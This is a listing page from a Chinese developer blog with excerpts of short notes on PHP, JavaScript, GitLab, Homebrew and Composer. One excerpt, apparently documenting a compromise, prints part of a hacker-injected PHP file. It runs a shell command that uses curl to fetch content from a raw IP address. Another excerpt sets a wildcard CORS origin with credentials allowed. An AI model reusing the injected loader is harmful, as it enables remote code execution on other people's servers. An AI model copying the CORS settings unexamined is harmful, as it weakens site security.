会员
众包
新闻
博问
闪存
赞助商
HarmonyOS
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
盘思动
三思而后折腾!
博客园
首页
新随笔
联系
订阅
管理
上一页
1
···
71
72
73
74
75
76
77
78
79
···
133
下一页
2021年8月6日
js返回上个页面再刷新
摘要: window.location.href = document.referrer; 先抓取到上个页面的链接 document.referrer;
阅读全文
posted @ 2021-08-06 17:56 盘思动
阅读(133)
评论(4)
推荐(0)
2021年8月4日
xm-select 获取选选择的值
摘要: var cheng = xmSelect.render({ el: '#cheng_xm_select_id', data: [ <?php foreach($cheng_user_list as $v){ ?> <?php if($v['is_sign'] == 1){ ?> <?php echo
阅读全文
posted @ 2021-08-04 18:01 盘思动
阅读(850)
评论(0)
推荐(0)
2021年8月3日
接口可以跨域访问
摘要: header('Access-Control-Allow-Origin: *'); header('Access-Control-Allow-Methods: POST'); header('Access-Control-Allow-Credentials: true');
阅读全文
posted @ 2021-08-03 18:23 盘思动
阅读(169)
评论(0)
推荐(0)
2021年7月29日
gitlab 版本查看
摘要: cat /opt/gitlab/embedded/service/gitlab-rails/VERSION
阅读全文
posted @ 2021-07-29 14:54 盘思动
阅读(543)
评论(0)
推荐(0)
gitlab 在linux安装环境下存储地址
摘要: [root@47c100c255c250 ~]# cd /var/opt/gitlab/git-data/repositories/ 您在 /var/spool/mail/root 中有新邮件 [root@47c100c255c250 repositories]# ls daijiawei +git
阅读全文
posted @ 2021-07-29 14:52 盘思动
阅读(229)
评论(0)
推荐(0)
mac命令终端exit不关闭窗口解决
摘要: 终端 偏好设置 描述文件 Shell 当shell完全退出时关闭
阅读全文
posted @ 2021-07-29 11:04 盘思动
阅读(696)
评论(0)
推荐(0)
m1 brew 启动已经安装好的mysql服务
摘要: brew services start mysql@5.7 当前安装的是5.7的版本的;
阅读全文
posted @ 2021-07-29 10:51 盘思动
阅读(242)
评论(0)
推荐(0)
2021年7月26日
php 无损压缩图片
摘要: 参考引用:https://packagist.org/packages/picturethumb/zzhpicturethumb 备注 基于composer 库中代码仅仅可以支持长宽比原图小的压缩参数,如需等于或者等于原图大小的需要调整代码; 实测压缩效果略低于tinypng ,但二次压缩会大小不变
阅读全文
posted @ 2021-07-26 18:07 盘思动
阅读(637)
评论(0)
推荐(0)
黑客注入的php文件
摘要: <?php function ex($cmd){ // system($cmd); // passthru($cmd); exec($cmd,$array); print_r($array); } ex("curl -A o -o- -L -s http://146.196.83.217:29324
阅读全文
posted @ 2021-07-26 09:57 盘思动
阅读(278)
评论(1)
推荐(0)
2021年7月24日
执行 composer --version 命令的时候报 Your requirements could not be resolved to an installable set of packages. 错误
摘要: Your requirements could not be resolved to an installable set of packages. 以上原因:不匹配composer.json要求的版本。 解决方案: composer可以设置忽略版本匹配, composer install --ig
阅读全文
posted @ 2021-07-24 18:16 盘思动
阅读(1645)
评论(0)
推荐(0)
上一页
1
···
71
72
73
74
75
76
77
78
79
···
133
下一页
公告